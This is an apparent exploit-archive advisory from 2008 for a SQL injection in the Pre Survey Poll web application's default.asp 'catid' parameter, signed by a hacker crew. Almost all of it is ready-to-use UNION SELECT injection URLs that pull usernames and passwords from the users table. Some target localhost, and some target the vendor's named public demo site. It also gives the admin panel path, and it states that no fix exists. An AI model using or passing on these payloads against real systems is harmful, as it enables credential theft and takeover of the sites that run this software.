Pre Survey Poll (default.asp catid) SQL Injection Vulnerability

2008-07-22 00:00:00

PRE SURVEY POLL Remote Sql Injection
DreamTurk / sqL Lov3r'Z Crew Co. 2008
Downlod: http://www.preproject.com/poll.asp / Price $28.00
Demo : http://www.preproject.com/poll/default.asp
Sql :
http://localhost/patch/default.asp?catid=1+union+select+0,username+from+users
http://localhost/patch/default.asp?catid=1+union+select+0,username+from+users

Admin Panel :
http://localhost/patch/admin/default.asp
Greatz : aLL My Friend'Z and str0ke

========================================From Turkey=============================================
Demo Page ;
http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users

http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users

#

Fixes

No fixes

In order to submit a new fix you need to be registered.